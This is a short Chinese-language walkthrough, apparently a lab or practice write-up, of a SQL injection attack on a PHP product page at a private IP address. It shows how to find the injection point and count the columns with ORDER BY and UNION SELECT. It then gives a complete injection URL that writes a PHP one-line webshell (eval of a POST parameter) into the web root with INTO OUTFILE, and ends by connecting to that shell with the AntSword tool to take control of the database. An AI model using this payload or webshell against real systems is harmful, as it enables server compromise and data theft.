一、找到注入点。
如上图所示,有很明显的传参地点,我们选择在id=13后面跟一个'判断是否有注入点。
跟上'之后 没有输出了,而跟上 -- qwe 将后面注释掉以后又恢复正常了,判断此处为注入点。
二、order by 查询字段数。
发现order by 6的时候还是正常的,当order by 7 的时候却出现问题了,判断字段数有6个。
三、找到输出位。
union select 1,2,3,4,5,6 -- qwe
可以看到2,3,4为输出位。
四、上传一句话木马。
到我们最关键的一步了,我们在输出位上跟上以下语句。
http://192.168.7.27/product.php?id=-12'union select 1,2,"<?php @eval($_POST[6]);?>",4,5,6 into outfile "/var/www/html/1.php"-- qwe
这里面的<?php @eval($_POST[6]);?>就是我们上传的一句话木马啦。
如果要判断是否执行成功可以加上if语句用sleep()函数判断。
五、蚁剑连接。
这里的URL地址就是咱们上传的一句话木马php文件的地址,密码就是我们POST上传的参数。
测试连接成功!
我们就可以对对方的数据库为所欲为啦。